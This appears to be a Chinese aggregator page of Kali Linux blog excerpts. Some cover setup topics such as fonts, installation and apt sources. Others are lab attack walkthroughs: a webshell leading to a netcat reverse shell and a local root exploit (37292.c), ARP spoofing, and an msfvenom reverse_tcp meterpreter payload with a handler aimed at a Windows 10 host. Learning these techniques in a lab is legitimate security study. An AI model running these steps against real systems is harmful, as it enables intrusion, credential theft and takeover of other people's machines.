kali

kali linux中文乱码修复

你。 提交于 2020-02-07 19:54:24
文章目录 一、当前系统支持的字符集 二、下载语言 三、重启 一、当前系统支持的字符集 进入语言设置 sudo dpkg-reconfigure locales 添加语言(按空格后就显示 [*] 表示选中),选中 en_US.UTF-8 , zh_CN.GBK 和 zh_CN.UTF-8 选好后按回车到退出的界面,然后将 en_US.UTF-8 选为默认,按回车退出 二、下载语言 sudo apt-get install xfonts-intl-chinese sudo apt-get install ttf-wqy-microhei 三、重启 sudo reboot 来源: CSDN 作者: sandalphon4869 链接: https://blog.csdn.net/sandalphon4869/article/details/104212805

kali 2020.1安装/kali乱码/kali无图形界面/kali汉化

梦想的初衷 提交于 2020-02-07 02:57:53
kali 2020.1安装/kali乱码/kali无图形界面/kali汉化 乖,听话 ~ 别装这个版本,安装好后没有图形界面的 &+& 那安装什么? 安装这个 http://cdimage.kali.org/ 这个版本------》 安装过程不讲解,网上有大量文章介绍,建议安装英文版,安装汉语会有出现乱码情况,解决办法:https://blog.csdn.net/dust_hk/article/details/103299136 感谢网上分享经验的大神们 爱你们 ~么么哒 ~(@_@) 来源: CSDN 作者: Shelly_Zhao 链接: https://blog.csdn.net/Shelly_Zhao/article/details/104196043

VM15 安装 Kali Linux 2019.2

◇◆丶佛笑我妖孽 提交于 2020-02-06 05:06:55
VM15 安装 Kali Linux 2019.2 VM15 安装 Kali Linux 2019.2 一 新建虚拟机 1. 选择自定义虚拟机,然后下一步 2. 选择Workstation 15.x 3. 选择稍后安装操作系统 4. 选择Linux Debian 9.x 64 位 5. 设置一下文件存储路径 6. Linux不吃性能所以不必设置多少 7. Linux也不占内存 8. 用默认 9. 用默认 10. 用默认 11. 创建新的虚拟磁盘 12. 空间默认20G也可以 13. 在本地选择一个存储位置 14. 完成. 二 设置镜像 1. 编辑虚拟机设置 2. 3. 4. 三 安装镜像 1. 2. 选择Graphical install 3. 选择 Continue 4. 5. 6. 7. 域名随便写或者不写 8. 密码别忘了 9. 10. 11. 12. 13. 14. 15. 16. 17. 四 登陆 1. 2. 完结撒花. 结尾: 如果你的DHCP配置不了-> 来源: CSDN 作者: Cdreamfly 链接: https://blog.csdn.net/Cdreamfly/article/details/104188364

kali 源

六眼飞鱼酱① 提交于 2020-02-02 02:44:44
kali linux 2019.2源 打开终端,输入 leafpad /etc/apt/sources.list 打开sources.list添加kali源 deb http://http.kali.org/kali kali-rolling main non-free contrib # deb-src http://http.kali.org/kali kali-rolling main non-free contrib 按esc,输入wq! ,保存退出。 输入sudo apt update更新软件列表,即可下载软件。 来源: https://www.cnblogs.com/betobe/p/12250926.html

kail Linux apt-get失败解决方案

こ雲淡風輕ζ 提交于 2020-02-01 05:07:52
kail Linux 更新总是失败 在百度搜索了各种方案之后 总结出的会遇见的两种情况 并且都已经操作过 编辑apt-get远程源文件 vim /etc/apt/sources-list 注释掉所有的,然后添加下面两条: deb http://http.kali.org/kali kali-rolling main contrib non-free deb http://old.kali.org/kali sana main non-free contrib 推荐使用中科大的源 #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 再次更新:已经可以更新 root@years:/etc/apt# apt-get update 更新命令: apt-get update && apt-get upgrade && apt-get dist-upgrade 问题二: 更换了本地源 依旧无法更新 原因是key过期了 需要重新添加,执行如下命令: root@yesra:~# wget -q -O - https://archive.kali.org

kali Linux 渗透测试 | ARP 欺骗

[亡魂溺海] 提交于 2020-01-31 04:50:33
目录 ARP 欺骗及其原理 ARP 欺骗实施步骤 必备工具安装 nmap 工具 dsniff 工具 driftnet 工具 ettercap 工具 ARP 欺骗测试 ARP 断网攻击 ARP 欺骗(不断网) 抓取图片 获取账号与密码 arp 缓存表对照 ARP协议: 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含 目标IP地址 的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。 ARP欺骗: 地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。相关协议有RARP、代理ARP。NDP用于在IPv6中代替地址解析协议。 实验原理 ARP协议是工作在网络层的协议,它负责将IP地址解析为MAC地址

记kali (Debian内核)安装mysql过程中踩的那些坑

青春壹個敷衍的年華 提交于 2020-01-30 21:27:54
为了mysql安装中的各种问题,浪费了大把时间,因为2019.4版本自带的mysql会报Can 't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock '(2) ";的问题,我把它卸了重装。 有人在/etc/mysql/my.cnf的client-server节点下加了socket=/tmp/mysqld.sock,然后使用ln -s /tmp/mysqld.sock /var/run/mysqld/mysqld.sock解决了这个问题。 但是这个办法对po主无效。 1.如何删除mariadb版本的mysql apt-get remove mysql-* dpkg -l |grep ^rc|awk '{print $2}' |sudo xargs dpkg -P 保险起见再执行以下命令: apt-get remove mariadb-client apt-get autoremove mariadb-client apt-get remove mariadb-server apt-get autoremove mariadb-server 如果提示没有安装所以不用删除说明删干净了(一定要检查有没删干净,po在这里踩过坑) 2.安装mysql 这里因为kali2的版本没有mysql的包

Kali学习 | 无线渗透:7.4 攻击WPS(Wi-Fi Proteced Setup)

半世苍凉 提交于 2020-01-28 12:48:59
Kali学习 | 无线渗透:7.4 攻击WPS(Wi-Fi Proteced Setup) WPS 介绍 使用Reaver破解WPS 使用Wifite攻击WPS WPS 介绍 WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定标准。 该标准主要是为了解决无线网络加密认证设定的步骤过于繁杂的弊病。 因为通常用户往往会因为设置步骤太麻烦,以至于不做任何加密安全设定,从而引起许多安全上的问题。 所以很多人使用WPS设置无线设备,可以通过个人识别码(PIN)或按钮(PBC)取代输入一个很长的密码短语。 当开启该功能后,攻击者就可以使用暴力攻击的方法来攻击WPS。 本小节将介绍使用各种工具攻击WPS。 现在大部分路由器上都支持WPS功能。 以前路由器有专门的WPS设置,现在的路由器使用QSS功能取代了。 这里以TP-LINK型号为例,介绍设置WPS功能,如图示。如果使用WPS的PBC方式,只需要按下路由器上的QSS/RESET按钮就可以了。 所从该界面可以看到QSS功能已开启,可以看到当前的PIN码是04588306。 这里可以重新生成新的PIN码,或者恢复初始PIN码。 使用Reaver破解WPS (1)插入无线网卡,使用ifconfig命令查看无线网卡是否已经正确插入。执行命令如下所示: 从输出的信息中可以看到,只有一个以太网接口etho。 这是因为无线网卡可能没有启动

linux内核提权

橙三吉。 提交于 2020-01-27 18:03:25
记一次linux内核提权 首先要得到一个webshell传个大马上去。 看到这里我已经传进去一个ma.php的大马,现在去访问它! 找到linux提权,开启kali系统,用nc弹个shell回来。 进入kali系统,输入nv -lvvp 12666等待连接。 输入kali系统的ip和端口。 点击开始链接后返回kali系统查看。 可以看到shell已经弹回来了,权限是www-data比较低的权限。 提权阶段 输入uname -a 查看内核版本,可以看到内核时3.13.0,下面进入kali系统查找exp。 有两个可以用的exp,我选第一个测试。 找到exp的目录把37292.c复制出来,并上传到服务器。 回到kali系统,编译文件,gcc 37292.c -o 37.o 给37.o执行权限,chmod 777 37.o并运行。 可以看到上图 提权成功,#号开头说明已经是root权限。 输入id查看下 ,确实已经是root权限了,提权完毕。 来源: CSDN 作者: 夜里的游魂 链接: https://blog.csdn.net/kerun1/article/details/104092616

kali Linux局域网渗透之win10

Deadly 提交于 2020-01-26 06:01:28
kali机:192.168.198.134 win10:192.168.198.1 我们先来查看下自己的IP地址 接着我们使用fping来扫描一下局域网内的所有IP fping -g IP/24 -->扫描局域网内所有IP 攻击正式开始 1.我们先用msfvenom来生成一个木马文件,它将在root目录生成一个名叫shell.exe文件 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.134 lport=5555 -f exe R > /root/shell.exe LHOST -->本地的IP地址 LPORT -->反向连接到主机的端口 R> -->木马生成的保存输出路径 2.打开msfconsole,键入以下代码 msf > use exploit/multi/handler -->设置模块 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -->设置payload为反向tcp连接 msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址 msf exploit(multi/handler) > set lport 5555 --